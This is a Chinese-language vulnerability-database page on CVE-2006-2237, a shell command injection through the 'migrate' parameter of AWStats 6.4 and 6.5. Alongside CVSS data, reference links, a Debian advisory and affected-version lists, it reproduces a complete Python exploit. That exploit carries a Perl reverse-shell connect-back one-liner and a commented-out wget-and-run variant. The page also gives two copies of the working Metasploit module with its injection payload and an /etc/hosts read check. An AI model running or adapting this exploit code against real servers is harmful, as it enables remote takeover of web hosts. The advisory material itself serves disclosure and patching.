CVE-2006-2237
CVSS5.1
发布时间 :2006-05-08 19:02:00
修订时间 :2011-03-07 21:35:35
NMCOEPS    

[原文]The web interface for AWStats 6.4 and 6.5, when statistics updates are enabled, allows remote attackers to execute arbitrary code via shell metacharacters in the migrate parameter.


[CNNVD]AWStats migrate参数处理Shell 输入验证漏洞(CNNVD-200605-116)

        AWStats是一款极为流行的基于Web的网站流量分析软件。
        AWStats对用户请求的处理上存在输入验证漏洞,远程攻击者可能利用此漏洞注入PHP代码执行任意命令。
        AWStats的awstats.pl脚本没有对migrate变量值做充分的过滤检查,当AllowToUpdateStatsFromBrowser选项被使能的时候,远程攻击者可能利用漏洞注入任意的Shell命令以Web进程权限执行。

- CVSS (基础分值)

CVSS分值: 5.1 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:awstats:awstats:6.4
cpe:/a:awstats:awstats:6.5

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2237
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2237
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200605-116
(官方数据源) CNNVD

- 其它链接及资源

http://www.osvdb.org/25284
(PATCH)  OSVDB  25284
http://secunia.com/advisories/19969
(VENDOR_ADVISORY)  SECUNIA  19969
http://www.vuxml.org/freebsd/2df297a2-dc74-11da-a22b-000c6ec775d9.html
(UNKNOWN)  MISC  http://www.vuxml.org/freebsd/2df297a2-dc74-11da-a22b-000c6ec775d9.html
http://www.vupen.com/english/advisories/2006/1678
(UNKNOWN)  VUPEN  ADV-2006-1678
http://www.securityfocus.com/bid/17844
(UNKNOWN)  BID  17844
http://www.osreviews.net/reviews/comm/awstats
(UNKNOWN)  MISC  http://www.osreviews.net/reviews/comm/awstats
http://awstats.sourceforge.net/awstats_security_news.php
(UNKNOWN)  CONFIRM  http://awstats.sourceforge.net/awstats_security_news.php
http://xforce.iss.net/xforce/xfdb/26287
(UNKNOWN)  XF  awstats-migrate-command-execution(26287)
http://www.ubuntulinux.org/support/documentation/usn/usn-285-1
(UNKNOWN)  UBUNTU  USN-285-1
http://www.novell.com/linux/security/advisories/2006_33_awstats.html
(UNKNOWN)  SUSE  SUSE-SA:2006:033
http://www.debian.org/security/2006/dsa-1058
(UNKNOWN)  DEBIAN  DSA-1058
http://security.gentoo.org/glsa/glsa-200606-06.xml
(UNKNOWN)  GENTOO  GLSA-200606-06
http://secunia.com/advisories/20710
(UNKNOWN)  SECUNIA  20710
http://secunia.com/advisories/20496
(UNKNOWN)  SECUNIA  20496
http://secunia.com/advisories/20186
(UNKNOWN)  SECUNIA  20186
http://secunia.com/advisories/20170
(UNKNOWN)  SECUNIA  20170

- 漏洞信息

AWStats migrate参数处理Shell 输入验证漏洞
中危 输入验证
2006-05-08 00:00:00 2006-05-09 00:00:00
远程  
        AWStats是一款极为流行的基于Web的网站流量分析软件。
        AWStats对用户请求的处理上存在输入验证漏洞,远程攻击者可能利用此漏洞注入PHP代码执行任意命令。
        AWStats的awstats.pl脚本没有对migrate变量值做充分的过滤检查,当AllowToUpdateStatsFromBrowser选项被使能的时候,远程攻击者可能利用漏洞注入任意的Shell命令以Web进程权限执行。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://www.debian.org/security/2005/dsa-1058

- 漏洞信息 (1755)

AWStats <= 6.5 (migrate) Remote Shell Command Injection Exploit (EDBID:1755)
cgi webapps
2006-05-06 Verified
0 redsand
N/A [点击下载]
#!/usr/bin/env python
# http://secunia.com/advisories/19969/
# by redsand@blacksecurity.org
# May 5, 2006 - HAPPY CINCO DE MAYO
# HAPPY BIRTHDAY DAD
# private plz


#
# 	redsand@jinxy ~/ $ nc -l -p 31337 -v
#	listening on [any] 31337 ...
#	connect to [65.99.197.147] from blacksecurity.org [65.99.197.147] 53377
#	id
#	uid=81(apache) gid=81(apache) groups=81(apache)
#


import sys, socket, base64
import urllib2, urlparse, urllib

# perl 1 line tcp connect-back code
# needs ip & port
cmd = 'perl -e \'$h="%s";$p=%r;use Socket;$sp=inet_aton($h);$sa=sockaddr_in($p,$sp);;socket(CLIENT,PF_INET,SOCK_STREAM,getprotobyname("tcp"));gethostbyname($h);connect(CLIENT,$sa);open(STDIN,">&CLIENT");open(STDOUT,">&CLIENT");open(STDERR,">&CLIENT");if(fork()){exec "/bin/sh"; exit(0); };\'';

class	rbawstatsMigrate:
	__url = '' 
	__user = ''
	__password = ''
	__auth = False
	__chost =False
	__cport = False
	
	def	__init__(self,host=False, ur=False, ps=False, chost=False, cport=False):
		if host:
			self.__url = host
		if ur:
			self.__user = ur
		if ps:	
			self.__password = ps

		if ur or ps:	self.__auth = True


		if chost: self.__chost = chost
		if cport: self.__cport = cport


		url = urlparse.urlsplit(self.__url)

		i = url[1].find(';')
		if i >= 0:
			self.__parsed_host = url[1][:i]
		else:
			self.__parsed_host = url[1]

	def	probe(self):

		cphost = socket.gethostbyname_ex(self.__chost)

		my_cmd = cmd % (cphost[2][0],self.__cport)
		url_xpl = { "config": self.__parsed_host,
			    "migrate":"|cd /tmp/ && %s|awstats052005.%s.txt" % (my_cmd, self.__parsed_host)
			    # "migrate":"|cd /tmp/ && wget %s && chmod 777 %s && /tmp/%s|awstats052005.%s.txt" % (rsv, fname, fname, self.__parsed_host)

			  }

		#if self.__url[len(self.__url) -1] != '?':
		#	url_xpl = '?' + url_xpl

		url = self.__url 
		url_xpl =  urllib.urlencode(url_xpl)

		try:
			req = urllib2.Request(url, url_xpl)
			if(self.__auth):
				b64str = base64.encodestring('%s:%s' % (self.__user,self.__password))[:-1]
				req.add_header('Authorization', "Basic %s"% b64str)

			req.add_header('Referer', "http://exploit.by.redsand.of.blacksecurity.org")
			req.add_header('Accept', 'text/xml,application/xml,application/xhtml+xml,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1')
			req.add_header('Accept-Language','en-us')
			req.add_header('Accept-Encoding','deflate, gzip')
			req.add_header('User-Agent', "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; [BL4CK] Security")
			req.add_header('Connection' ,'Keep-Alive')
			req.add_header('Cache-Control','no-cache')
			q = urllib2.urlopen(req)
		except IOError, e:
			print "FAILED %s" % e
			sys.exit(0)

		print "SUCCESS, now check to see if it connected-back properly to %s:%s" % (self.__chost,self.__cport)
		sys.exit(0)
		

		
			
user=False
pas=False
url=False
chst=False
cprt=False

print "[BL4CK] AWStats CMD Injection Exploit by redsand@blacksecurity.org"
print "http://secunia.com/advisories/19969/"
print "http://blacksecurity.org - f0r my h0mi3s"

argc = len(sys.argv)
if(argc <= 3):
	print "USAGE: %s http://host/awstats.pl <connect back host> <connect back port> [username] [password] " % sys.argv[0]
	print "\t\* Support 401 HTTP Authentication"
	sys.exit(0)
if(argc > 1):
	url = sys.argv[1]
if(argc > 2):
	chst = sys.argv[2]
if(argc > 3):
	cprt = sys.argv[3]
if(argc > 4):
	user = sys.argv[4]
if(argc > 5):
	pas = sys.argv[5]




		
red = rbawstatsMigrate(url, user, pas, chst, cprt)

red.probe()

# milw0rm.com [2006-05-06]
		

- 漏洞信息 (16886)

AWStats (6.4-6.5) migrate Remote Command Execution (EDBID:16886)
cgi webapps
2010-07-03 Verified
0 metasploit
N/A [点击下载]
##
# $Id: awstats_migrate_exec.rb 9671 2010-07-03 06:21:31Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'AWStats migrate Remote Command Execution',
			'Description'    => %q{
					This module exploits an arbitrary command execution vulnerability in the
				AWStats CGI script. AWStats v6.4 and v6.5 are vulnerable. Perl based
				payloads are recommended with this module. The vulnerability is only
				present when AllowToUpdateStatsFromBrowser is enabled in the AWstats
				configuration file (non-default).
			},
			'Author'         => [ 'patrick' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9671 $',
			'References'     =>
				[
					['CVE', '2006-2237'],
					['OSVDB', '25284'],
					['BID', '17844'],
					['URL', 'http://awstats.sourceforge.net/awstats_security_news.php'],
					['URL', 'http://www.milw0rm.com/exploits/1755'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 512,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl ruby bash telnet',
						}
				},
			'Platform'       => 'unix',
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'Automatic', { }]],
			'DisclosureDate' => 'May 04 2006',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('URI', [true, "The full URI path to awstats.pl", "/cgi-bin/awstats.pl"]),
				OptString.new('AWSITE', [true, "The AWStats config site name", "demo"]),
			], self.class)
	end

	def check
		res = send_request_cgi({
			'uri'      => datastore['URI'],
			'vars_get' =>
				{
					'migrate' => "|echo;cat /etc/hosts;echo|awstats#{Rex::Text.rand_text_numeric(6)}.#{datastore['AWSITE']}.txt"
				}
			}, 25)

		if (res and res.body.match(/localhost/))
			return Exploit::CheckCode::Vulnerable
		end

		return Exploit::CheckCode::Safe
	end

	def exploit
		command = Rex::Text.uri_encode("cd /tmp &&" + payload.encoded)
		sploit = datastore['URI'] + "?migrate=|echo;echo%20YYY;#{command};echo%20YYY;echo|awstats#{Rex::Text.rand_text_numeric(6)}.#{datastore['AWSITE']}.txt"

		res = send_request_raw({
			'uri'     => sploit,
			'method'  => 'GET',
			'headers' =>
				{
					'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
					'Connection' => 'Close',
				}
			}, 25)

		if (res)
			print_status("The server returned: #{res.code} #{res.message}")

			m = res.body.match(/YYY\n(.*)\nYYY/m)

			if (m)
				print_status("Command output from the server:")
				print("\n" + m[1] + "\n\n")
			else
				print_status("This server may not be vulnerable")
			end
		else
			print_status("No response from the server")
		end
	end

end
		

- 漏洞信息 (F82352)

AWStats migrate Remote Command Execution (PacketStormID:F82352)
2009-10-30 00:00:00
patrick  metasploit.com
exploit,arbitrary,cgi,perl
CVE-2006-2237
[点击下载]

This Metasploit module exploits an arbitrary command execution vulnerability in the AWStats CGI script. AWStats v6.4 and v6.5 are vulnerable. Perl based payloads are recommended with this module. The vulnerability is only present when AllowToUpdateStatsFromBrowser is enabled in the AWstats configuration file (non-default).

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'AWStats migrate Remote Command Execution',
			'Description'    => %q{
					This module exploits an arbitrary command execution vulnerability in the
					AWStats CGI script. AWStats v6.4 and v6.5 are vulnerable. Perl based
					payloads are recommended with this module. The vulnerability is only
					present when AllowToUpdateStatsFromBrowser is enabled in the AWstats
					configuration file (non-default).
			},
			'Author'         => [ 'patrick' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2006-2237'],
					['OSVDB', '25284'],
					['BID', '17844'],
					['URL', 'http://awstats.sourceforge.net/awstats_security_news.php'],
					['URL', 'http://www.milw0rm.com/exploits/1755'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 512,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl ruby bash telnet',
						}
				},
			'Platform'       => 'unix',
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'Automatic', { }]],
			'DisclosureDate' => 'May 04 2006',
			'DefaultTarget'  => 0))

			register_options(
				[
					OptString.new('URI', [true, "The full URI path to awstats.pl", "/cgi-bin/awstats.pl"]),
					OptString.new('AWSITE', [true, "The AWStats config site name", "demo"]),
				], self.class)
	end

	def check
		res = send_request_cgi({
			'uri'      => datastore['URI'],
			'vars_get' =>
			{
				'migrate' => "|echo;cat /etc/hosts;echo|awstats#{Rex::Text.rand_text_numeric(6)}.#{datastore['AWSITE']}.txt"
			}
		}, 25)

		if (res and res.body.match(/localhost/))
			return Exploit::CheckCode::Vulnerable
		end

		return Exploit::CheckCode::Safe
	end

	def exploit
		command = Rex::Text.uri_encode("cd /tmp &&" + payload.encoded)
		sploit = datastore['URI'] + "?migrate=|echo;echo%20YYY;#{command};echo%20YYY;echo|awstats#{Rex::Text.rand_text_numeric(6)}.#{datastore['AWSITE']}.txt"

		res = send_request_raw({
			'uri'     => sploit,
			'method'  => 'GET',
			'headers' =>
			{
				'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
				'Connection' => 'Close',
			}
		}, 25)

		if (res)
			print_status("The server returned: #{res.code} #{res.message}")

			m = res.body.match(/YYY\n(.*)\nYYY/m)

			if (m)
				print_status("Command output from the server:")
				print("\n" + m[1] + "\n\n")
			else
				print_status("This server may not be vulnerable")
			end
		else
			print_status("No response from the server")
		end
	end

end

    

- 漏洞信息 (F46495)

Debian Linux Security Advisory 1058-1 (PacketStormID:F46495)
2006-05-22 00:00:00
Debian  debian.org
advisory,web,arbitrary
linux,debian
CVE-2006-2237
[点击下载]

Debian Security Advisory 1058-1 - Hendrik Weimer discovered that specially crafted web requests can cause awstats, a powerful and featureful web server log analyzer, to execute arbitrary commands.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1058-1                    security@debian.org
http://www.debian.org/security/                             Martin Schulze
May 18th, 2006                          http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : awstats
Vulnerability  : missing input sanitising
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2006-2237
BugTraq ID     : 17844
Debian Bugs    : 364443 365909 365910

Hendrik Weimer discovered that specially crafted web requests can
cause awstats, a powerful and featureful web server log analyzer, to
execute arbitrary commands.

The old stable distribution (woody) is not affected by this problem.

For the stable distribution (sarge) this problem has been fixed in
version 6.4-1sarge2.

For the unstable distribution (sid) this problem has been fixed in
version 6.5-2.

We recommend that you upgrade your awstats package.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given at the end of this advisory:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/a/awstats/awstats_6.4-1sarge2.dsc
      Size/MD5 checksum:      591 bc33a94cbf5cb3fe89922f312434d0d6
    http://security.debian.org/pool/updates/main/a/awstats/awstats_6.4-1sarge2.diff.gz
      Size/MD5 checksum:    18702 88fa1b4b53640c4b5b05deaca9a3c156
    http://security.debian.org/pool/updates/main/a/awstats/awstats_6.4.orig.tar.gz
      Size/MD5 checksum:   918435 056e6fb0c7351b17fe5bbbe0aa1297b1

  Architecture independent components:

    http://security.debian.org/pool/updates/main/a/awstats/awstats_6.4-1sarge2_all.deb
      Size/MD5 checksum:   728566 d3241a30634640b4f363097f751e7282


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (GNU/Linux)

iD8DBQFEbKCXW5ql+IAeqTIRAufmAJ9ougqWpcuvBfNlmM9XWt9Cg2tlFQCgsVM4
Fkf6SQ16/Ci9j9zzf/bT3gg=
=318h
-----END PGP SIGNATURE-----

    

- 漏洞信息

25284
AWStats migrate Variable Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade, Third-Party Solution
Exploit Public, Exploit Commercial Vendor Verified

- 漏洞描述

AWStats contains a flaw that may allow a malicious user to execute arbitrary commands via the "|" pipe character. The issue is triggered due to improper sanitization to the 'migrate' variable before being used in an "open()" call. It is possible that the flaw may allow arbitrary code execution resulting in a loss of integrity.

- 时间线

2006-05-05 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 6.6 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

AWStats Remote Arbitrary Command Execution Vulnerability
Input Validation Error 17844
Yes No
2006-05-04 12:00:00 2006-07-21 08:42:00
Hendrik Weimer is credited with the discovery of these vulnerabilities.

- 受影响的程序版本

Ubuntu Ubuntu Linux 5.10 powerpc
Ubuntu Ubuntu Linux 5.10 i386
Ubuntu Ubuntu Linux 5.10 amd64
Ubuntu Ubuntu Linux 5.0 4 powerpc
Ubuntu Ubuntu Linux 5.0 4 i386
Ubuntu Ubuntu Linux 5.0 4 amd64
S.u.S.E. Linux Professional 10.0 OSS
S.u.S.E. Linux Professional 10.0
S.u.S.E. Linux Professional 9.3 x86_64
S.u.S.E. Linux Professional 9.3
S.u.S.E. Linux Professional 9.2 x86_64
S.u.S.E. Linux Professional 9.2
S.u.S.E. Linux Professional 9.1 x86_64
S.u.S.E. Linux Professional 9.1
S.u.S.E. Linux Professional 10.1
S.u.S.E. Linux Personal 10.0 OSS
S.u.S.E. Linux Personal 9.3 x86_64
S.u.S.E. Linux Personal 9.3
S.u.S.E. Linux Personal 9.2 x86_64
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1 x86_64
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Personal 10.1
Gentoo Linux
Debian Linux 3.1 sparc
Debian Linux 3.1 s/390
Debian Linux 3.1 ppc
Debian Linux 3.1 mipsel
Debian Linux 3.1 mips
Debian Linux 3.1 m68k
Debian Linux 3.1 ia-64
Debian Linux 3.1 ia-32
Debian Linux 3.1 hppa
Debian Linux 3.1 arm
Debian Linux 3.1 amd64
Debian Linux 3.1 alpha
Debian Linux 3.1
AWStats AWStats 6.5 -1

- 漏洞讨论

AWStats is prone to an arbitrary command-execution vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to execute arbitrary shell commands in the context of the webserver process. This may help attackers compromise the underlying system; other attacks are also possible.

- 漏洞利用

Attackers can exploit this issue via a web client.

- 解决方案

Currently we are not aware of any official vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.commailto:vuldb@securityfocus.com.
Please see the references for third-party vendor advisories and fixes.

Note: Although Debian advisory DSA 1058-1 was released to address this issue, Debian has reported that DSA 1058-1 does not in fact address the issue. Users should refer to DSA 1075-1 for fixes.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站